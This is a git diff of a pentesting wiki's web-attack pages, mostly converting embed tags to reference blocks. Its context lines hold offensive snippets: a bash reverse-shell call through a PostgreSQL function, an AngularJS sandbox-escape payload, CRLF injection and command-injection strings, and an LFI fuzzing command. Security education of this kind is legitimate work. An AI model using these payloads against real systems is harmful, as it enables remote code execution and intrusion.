--git a/src/network-services-pentesting/pentesting-web/graphql.md b/src/network-services-pentesting/pentesting-web/graphql.md index a92f1630e..3d41fcf66 100644 --- a/src/network-services-pentesting/pentesting-web/graphql.md +++ b/src/network-services-pentesting/pentesting-web/graphql.md 
@@ -2,7 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} - ## Introduction GraphQL is **highlighted** as an **efficient alternative** to REST API, offering a simplified approach for querying data from the backend. In contrast to REST, which often necessitates numerous requests across varied endpoints to gather data, GraphQL enables the fetching of all required information through a **single request**. This streamlining significantly **benefits developers** by diminishing the intricacy of their data fetching processes. @@ -623,7 +622,9 @@ curl -X POST -H "User-Agent: graphql-cop/1.13" -H "Content-Type: application/jso ### Automatic Tests -{% embed url="https://graphql-dashboard.herokuapp.com/" %} +{{#ref}} +https://graphql-dashboard.herokuapp.com/ +{{#endref}} - Video explaining AutoGraphQL: [https://www.youtube.com/watch?v=JJmufWfVvyU](https://www.youtube.com/watch?v=JJmufWfVvyU) @@ -637,8 +638,4 @@ curl -X POST -H "User-Agent: graphql-cop/1.13" -H "Content-Type: application/jso - [**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696) - [**https://portswigger.net/web-security/graphql**](https://portswigger.net/web-security/graphql) - {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md b/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md index 996f5d6d8..2bb6ad07e 100644 --- a/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md +++ b/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md 
@@ -43,7 +43,9 @@ Note that even if this was done for AWS machines, it could be done for any other For a better description of this process check: -{% embed url="https://trickest.com/blog/cloudflare-bypass-discover-ip-addresses-aws/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} +{{#ref}} +https://trickest.com/blog/cloudflare-bypass-discover-ip-addresses-aws/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks +{{#endref}} ```bash # Find open ports @@ -141,6 +143,3 @@ Find more info about how to do this in the [original article](https://scrapeops. - [https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/network-services-pentesting/pentesting-web/werkzeug.md b/src/network-services-pentesting/pentesting-web/werkzeug.md index d4e3d0800..aa9242640 100644 --- a/src/network-services-pentesting/pentesting-web/werkzeug.md +++ b/src/network-services-pentesting/pentesting-web/werkzeug.md @@ -2,7 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} - ## Console RCE If debug is active you could try to access to `/console` and gain RCE. @@ -162,7 +161,9 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a ## Automated Exploitation -{% embed url="https://github.com/Ruulian/wconsole_extractor" %} +{{#ref}} +https://github.com/Ruulian/wconsole_extractor +{{#endref}} ## References @@ -171,8 +172,4 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a - [**https://github.com/pallets/werkzeug/issues/2833**](https://github.com/pallets/werkzeug/issues/2833) - [**https://mizu.re/post/twisty-python**](https://mizu.re/post/twisty-python) - {{#include ../../banners/hacktricks-training.md}} - - - 
diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md index 180de8d19..908adea45 100644 --- a/src/network-services-pentesting/pentesting-web/wordpress.md +++ b/src/network-services-pentesting/pentesting-web/wordpress.md @@ -249,7 +249,9 @@ This is the response when it doesn't work: ## SSRF -{% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %} +{{#ref}} +https://github.com/t0gu/quickpress/blob/master/core/requests.go +{{#endref}} This tool checks if the **methodName: pingback.ping** and for the path **/wp-json/oembed/1.0/proxy** and if exists, it tries to exploit them. @@ -435,6 +437,3 @@ Also, **only install trustable WordPress plugins and themes**. - Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses. {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/other-web-tricks.md b/src/other-web-tricks.md index a17d557c7..74a7feac3 100644 --- a/src/other-web-tricks.md +++ b/src/other-web-tricks.md @@ -2,7 +2,6 @@ {{#include ./banners/hacktricks-training.md}} - ### Host header Several times the back-end trust the **Host header** to perform some actions. For example, it could use its value as the **domain to send a password reset**. So when you receive an email with a link to reset your password, the domain being used is the one you put in the Host header.Then, you can request the password reset of other users and change the domain to one controlled by you to steal their password reset codes. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2). 
@@ -10,7 +9,6 @@ Several times the back-end trust the **Host header** to perform some actions. Fo > [!WARNING] > Note that it's possible that you don't even need to wait for the user to click on the reset password link to get the token, as maybe even **spam filters or other intermediary devices/bots will click on it to analyze it**. - ### Session booleans Some times when you complete some verification correctly the back-end will **just add a boolean with the value "True" to a security attribute your session**. Then, a different endpoint will know if you successfully passed that check.\ @@ -26,7 +24,9 @@ Register an email, before confirming it change the email, then, if the new confi ### Access Internal servicedesk of companies using atlassian -{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %} +{{#ref}} +https://yourcompanyname.atlassian.net/servicedesk/customer/user/login +{{#endref}} ### TRACE method @@ -34,7 +34,4 @@ Developers might forget to disable various debugging options in the production e ![Image for post](https://miro.medium.com/max/1330/1*wDFRADTOd9Tj63xucenvAA.png) - {{#include ./banners/hacktricks-training.md}} - - diff --git a/src/pentesting-web/captcha-bypass.md b/src/pentesting-web/captcha-bypass.md index d8b38e4b4..c2f59772a 100644 --- a/src/pentesting-web/captcha-bypass.md +++ b/src/pentesting-web/captcha-bypass.md 
@@ -32,9 +32,8 @@ To **bypass** the captcha during **server testing** and automate user input func [**CapSolver**](https://www.capsolver.com/?utm_source=google&utm_medium=ads&utm_campaign=scraping&utm_term=hacktricks&utm_content=captchabypass) is an AI-powered service that specializes in solving various types of captchas automatically, empowers data collection by helping developers easily overcome the captcha challenges encountered during Web Scraping. It supports captchas such as **reCAPTCHA V2, reCAPTCHA V3, DataDome, AWS Captcha, Geetest, and Cloudflare turnstile among others**. For developers, Capsolver offers API integration options detailed in [**documentation**](https://docs.capsolver.com/?utm_source=github&utm_medium=banner_github&utm_campaign=fcsrv)**,** facilitating the integration of captcha solving into applications. They also provide browser extensions for [Chrome](https://chromewebstore.google.com/detail/captcha-solver-auto-captc/pgojnojmmhpofjgdmaebadhbocahppod) and [Firefox](https://addons.mozilla.org/es/firefox/addon/capsolver-captcha-solver/), making it easy to use their service directly within a browser. Different pricing packages are available to accommodate varying needs, ensuring flexibility for users. -{% embed url="https://www.capsolver.com/?utm_campaign=scraping&utm_content=captchabypass&utm_medium=ads&utm_source=google&utm_term=hacktricks" %} +{{#ref}} +https://www.capsolver.com/?utm_campaign=scraping&utm_content=captchabypass&utm_medium=ads&utm_source=google&utm_term=hacktricks +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/client-side-template-injection-csti.md b/src/pentesting-web/client-side-template-injection-csti.md index b127c789b..b21b0bae1 100644 --- a/src/pentesting-web/client-side-template-injection-csti.md +++ b/src/pentesting-web/client-side-template-injection-csti.md 
@@ -2,7 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - ## Summary It is like a [**Server Side Template Injection**](ssti-server-side-template-injection/) but in the **client**. The **SSTI** can allow you to **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim's browser. @@ -26,8 +25,7 @@ In scenarios where user input is dynamically inserted into the HTML body tagged You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) and in [**Burp Suite Academy**](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression) -> [!CAUTION] -> [**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `` should work. +> [!CAUTION] > [**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `` should work. ## VueJS @@ -83,10 +81,8 @@ javascript:alert(1)%252f%252f..%252fcss-images ## **Brute-Force Detection List** -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %} - +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index 4e6472199..22c1b5279 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md 
@@ -2,7 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - ## What is command Injection? A **command injection** permits the execution of arbitrary operating system commands by an attacker on the server hosting an application. As a result, the application and all its data can be fully compromised. The execution of these commands typically allows the attacker to gain unauthorized access or control over the application's environment and underlying system. @@ -132,7 +131,9 @@ powershell C:**2\n??e*d.*? # notepad ## Brute-Force Detection List -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt +{{#endref}} ## References @@ -140,7 +141,3 @@ powershell C:**2\n??e*d.*? # notepad - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection) {{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-web/crlf-0d-0a.md b/src/pentesting-web/crlf-0d-0a.md index 5d697aed3..3fe8460f4 100644 --- a/src/pentesting-web/crlf-0d-0a.md +++ b/src/pentesting-web/crlf-0d-0a.md @@ -2,8 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - - ### CRLF Carriage Return (CR) and Line Feed (LF), collectively known as CRLF, are special character sequences used in the HTTP protocol to denote the end of a line or the start of a new one. Web servers and browsers use CRLF to distinguish between HTTP headers and the body of a response. These characters are universally employed in HTTP/1.1 communications across various web server types, such as Apache and Microsoft IIS. 
@@ -86,7 +84,9 @@ http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:te Check more examples in: -{% embed url="https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md" %} +{{#ref}} +https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md +{{#endref}} ### HTTP Header Injection @@ -217,9 +217,4 @@ To mitigate the risks of CRLF (Carriage Return and Line Feed) or HTTP Header Inj - [**https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning) - [**https://www.netsparker.com/blog/web-security/crlf-http-header/**](https://www.netsparker.com/blog/web-security/crlf-http-header/) - - {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md index ef056696a..3fc94d3c8 100644 --- a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md +++ b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md @@ -251,7 +251,9 @@ XS-Search are oriented to **exfiltrate cross-origin information** abusing **side ## Brute-Force Detection List -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt +{{#endref}} ## References @@ -261,6 +263,3 @@ XS-Search are oriented to **exfiltrate cross-origin information** abusing **side - [https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) {{#include ../../banners/hacktricks-training.md}} - - - 
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md index 6bf26f494..3dd1faf6e 100644 --- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md +++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md @@ -258,7 +258,9 @@ This vulnerability, identified as CVE-2019–11358, illustrates how a deep copy ### Another tutorial with CVEs -{% embed url="https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2" %} +{{#ref}} +https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2 +{{#endref}} ### Tools to detect Prototype Pollution @@ -392,6 +394,3 @@ To reduce the risk of prototype pollution, the strategies listed below can be em - [https://blog.p6.is/AST-Injection/](https://blog.p6.is/AST-Injection/) {{#include ../../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/file-inclusion/README.md b/src/pentesting-web/file-inclusion/README.md index e9cb95f94..d54afcc85 100644 --- a/src/pentesting-web/file-inclusion/README.md +++ b/src/pentesting-web/file-inclusion/README.md @@ -23,7 +23,9 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../ **Mixing several \*nix LFI lists and adding more paths I have created this one:** -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt +{{#endref}} Try also to change `/` for `\`\ Try also to add `../../../../../` 
@@ -34,7 +36,9 @@ A list that uses several techniques to find the file /etc/password (to check if Merge of different wordlists: -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt +{{#endref}} Try also to change `/` for `\`\ Try also to remove `C:/` and add `../../../../../` @@ -689,6 +693,3 @@ If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/pha {% file src="../../images/EN-Local-File-Inclusion-1.pdf" %} {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/file-inclusion/phar-deserialization.md b/src/pentesting-web/file-inclusion/phar-deserialization.md index dd45a5d7b..9a45d0c5e 100644 --- a/src/pentesting-web/file-inclusion/phar-deserialization.md +++ b/src/pentesting-web/file-inclusion/phar-deserialization.md @@ -2,8 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} - - **Phar** files (PHP Archive) files **contain meta data in serialized format**, so, when parsed, this **metadata** is **deserialized** and you can try to abuse a **deserialization** vulnerability inside the **PHP** code. The best thing about this characteristic is that this deserialization will occur even using PHP functions that do not eval PHP code like **file_get_contents(), fopen(), file() or file_exists(), md5_file(), filemtime() or filesize()**. @@ -69,11 +67,8 @@ php vuln.php ### References -{% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %} - - +{{#ref}} +https://blog.ripstech.com/2018/new-php-exploitation-technique/ +{{#endref}} {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md index c313ba80c..4653b285e 100644 --- a/src/pentesting-web/file-upload/README.md +++ b/src/pentesting-web/file-upload/README.md 
@@ -2,7 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} - ## File Upload General Methodology Other useful extensions: @@ -200,7 +199,9 @@ Here’s a top 10 list of things that you can achieve by uploading (from [here]( #### Burp Extension -{% embed url="https://github.com/portswigger/upload-scanner" %} +{{#ref}} +https://github.com/portswigger/upload-scanner +{{#endref}} ## Magic Header Bytes @@ -325,8 +326,4 @@ More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-frie - [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) - [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a) - {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/hacking-jwt-json-web-tokens.md b/src/pentesting-web/hacking-jwt-json-web-tokens.md index 75f00b0a4..3338e3983 100644 --- a/src/pentesting-web/hacking-jwt-json-web-tokens.md +++ b/src/pentesting-web/hacking-jwt-json-web-tokens.md @@ -2,7 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - **Part of this post is based in the awesome post:** [**https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology**](https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology)\ **Author of the great tool to pentest JWTs** [**https://github.com/ticarpi/jwt_tool**](https://github.com/ticarpi/jwt_tool) @@ -245,7 +244,9 @@ However, imagine a situation where the maximun length of the ID is 4 (0001-9999) ### JWT Registered claims -{% embed url="https://www.iana.org/assignments/jwt/jwt.xhtml#claims" %} +{{#ref}} +https://www.iana.org/assignments/jwt/jwt.xhtml#claims +{{#endref}} ### Other attacks 
@@ -263,9 +264,8 @@ The token's expiry is checked using the "exp" Payload claim. Given that JWTs are ### Tools -{% embed url="https://github.com/ticarpi/jwt_tool" %} - +{{#ref}} +https://github.com/ticarpi/jwt_tool +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - diff --git a/src/pentesting-web/ldap-injection.md b/src/pentesting-web/ldap-injection.md index cd74a92e1..a85346847 100644 --- a/src/pentesting-web/ldap-injection.md +++ b/src/pentesting-web/ldap-injection.md @@ -4,7 +4,6 @@ {{#include ../banners/hacktricks-training.md}} - ## LDAP Injection ### **LDAP** @@ -216,10 +215,8 @@ intitle:"phpLDAPadmin" inurl:cmd.php ### More Payloads -{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %} - +{{#ref}} +https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/oauth-to-account-takeover.md b/src/pentesting-web/oauth-to-account-takeover.md index 34a0c2763..cf7454fea 100644 --- a/src/pentesting-web/oauth-to-account-takeover.md +++ b/src/pentesting-web/oauth-to-account-takeover.md @@ -2,7 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - ## Basic Information OAuth offers various versions, with foundational insights accessible at [OAuth 2.0 documentation](https://oauth.net/2/). This discussion primarily centers on the widely used [OAuth 2.0 authorization code grant type](https://oauth.net/2/grant-types/authorization-code/), providing an **authorization framework that enables an application to access or perform actions on a user's account in another application** (the authorization server). 
@@ -158,7 +157,9 @@ aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ For more detailed info about how to abuse AWS cognito check: -{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum" %} +{{#ref}} +https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum +{{#endref}} ### Abusing other Apps tokens @@ -231,8 +232,4 @@ If the platform you are testing is an OAuth provider [**read this to test for po - [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1) - [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors) - {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md index 2fdfdf809..ad7c79c0b 100644 --- a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md +++ b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md @@ -241,9 +241,8 @@ xslt-server-side-injection-extensible-stylesheet-language-transformations.md ## Brute-Force Detection List -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/sql-injection/README.md b/src/pentesting-web/sql-injection/README.md index 4a77964ae..4ed8e022f 100644 --- a/src/pentesting-web/sql-injection/README.md +++ b/src/pentesting-web/sql-injection/README.md 
@@ -2,7 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} - ## What is SQL injection? An **SQL injection** is a security flaw that allows attackers to **interfere with database queries** of an application. This vulnerability can enable attackers to **view**, **modify**, or **delete** data they shouldn't access, including information of other users or any data the application can access. Such actions may result in permanent changes to the application's functionality or content or even compromision of the server or denial of service. @@ -143,7 +142,9 @@ Also, if you have access to the output of the query, you could make it **print t ### Identifying with PortSwigger -{% embed url="https://portswigger.net/web-security/sql-injection/cheat-sheet" %} +{{#ref}} +https://portswigger.net/web-security/sql-injection/cheat-sheet +{{#endref}} ## Exploiting Union Based @@ -282,7 +283,6 @@ We have already discussed all the ways to exploit a SQL Injection vulnerability. Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) - ## Authentication bypass List to try to bypass the login functionality: @@ -533,7 +533,9 @@ This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup ### WAF bypass suggester tools -{% embed url="https://github.com/m4ll0k/Atlas" %} +{{#ref}} +https://github.com/m4ll0k/Atlas +{{#endref}} ## Other Guides @@ -542,10 +544,9 @@ This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup ## Brute-Force Detection List -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt +{{#endref}} ​ {{#include ../../banners/hacktricks-training.md}} - - - 
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md index a671e3d11..451278260 100644 --- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md +++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md @@ -135,7 +135,9 @@ SELECT sys('bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"'); You can find this **library precompiled** to several different PostgreSQL versions and even can **automate this process** (if you have PostgreSQL access) with: -{% embed url="https://github.com/Dionach/pgexec" %} +{{#ref}} +https://github.com/Dionach/pgexec +{{#endref}} ### RCE in Windows @@ -351,6 +353,3 @@ print(" drop function connect_back(text, integer);") - [https://www.exploit-db.com/papers/13084](https://www.exploit-db.com/papers/13084) {{#include ../../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/README.md b/src/pentesting-web/ssrf-server-side-request-forgery/README.md index 834ebe83d..4233fbf8d 100644 --- a/src/pentesting-web/ssrf-server-side-request-forgery/README.md +++ b/src/pentesting-web/ssrf-server-side-request-forgery/README.md @@ -369,7 +369,9 @@ SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP ### To practice -{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %} +{{#ref}} +https://github.com/incredibleindishell/SSRF_Vulnerable_Lab +{{#endref}} ## References @@ -379,7 +381,3 @@ SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP - [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) {{#include ../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md index 79b63fe79..d3e850c2e 100644 --- a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md +++ b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md @@ -167,7 +167,9 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) can generate vari Check out the [**URL validation bypass cheat sheet** webapp](https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet) from portswigger were you can introduce the allowed host and the attackers one and it'll generate a list of URLs to try for you. It also considers if you can use the URL in a parameter, in a Host header or in a CORS header. -{% embed url="https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet" %} +{{#ref}} +https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet +{{#endref}} ### Bypass via redirect @@ -221,6 +223,3 @@ image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing- - [https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet](https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/ssti-server-side-template-injection/README.md b/src/pentesting-web/ssti-server-side-template-injection/README.md index dc06dcbe5..9dc05dac3 100644 --- a/src/pentesting-web/ssti-server-side-template-injection/README.md +++ b/src/pentesting-web/ssti-server-side-template-injection/README.md 
@@ -2,7 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} - ## What is SSTI (Server-Side Template Injection) Server-side template injection is a vulnerability that occurs when an attacker can inject malicious code into a template that is executed on the server. This vulnerability can be found in various technologies, including Jinja. @@ -466,8 +465,6 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1 - More info in [https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756) - - ## ### Smarty (PHP) @@ -1097,7 +1094,9 @@ If you think it could be useful, read: ## Brute-Force Detection List -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt +{{#endref}} ## Practice & References @@ -1106,6 +1105,3 @@ If you think it could be useful, read: - [https://portswigger.net/web-security/server-side-template-injection](https://portswigger.net/web-security/server-side-template-injection) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/unicode-injection/unicode-normalization.md b/src/pentesting-web/unicode-injection/unicode-normalization.md index 365ba43cc..a1664d6d0 100644 --- a/src/pentesting-web/unicode-injection/unicode-normalization.md +++ b/src/pentesting-web/unicode-injection/unicode-normalization.md @@ -79,7 +79,9 @@ Then, a malicious user could insert a different Unicode character equivalent to #### sqlmap template -{% embed url="https://github.com/carlospolop/sqlmap_to_unicode_template" %} +{{#ref}} +https://github.com/carlospolop/sqlmap_to_unicode_template +{{#endref}} ### XSS (Cross Site Scripting) 
@@ -104,6 +106,3 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* allows t - [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md b/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md index dbe25179b..544fc742e 100644 --- a/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md +++ b/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md @@ -418,7 +418,9 @@ version="1.0"> ## **Brute-Force Detection List** -{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xslt.txt" %} +{{#ref}} +https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xslt.txt +{{#endref}} ## **References** @@ -427,6 +429,3 @@ version="1.0"> - [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf) {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/xss-cross-site-scripting/README.md b/src/pentesting-web/xss-cross-site-scripting/README.md index 86cdd77a6..f8a1f5f0b 100644 --- a/src/pentesting-web/xss-cross-site-scripting/README.md +++ b/src/pentesting-web/xss-cross-site-scripting/README.md @@ -1,6 +1,5 @@ # XSS (Cross Site Scripting) - ## Methodology 1. Check if **any value you control** (_parameters_, _path_, _headers_?, _cookies_?) is being **reflected** in the HTML or **used** by **JS** code. 
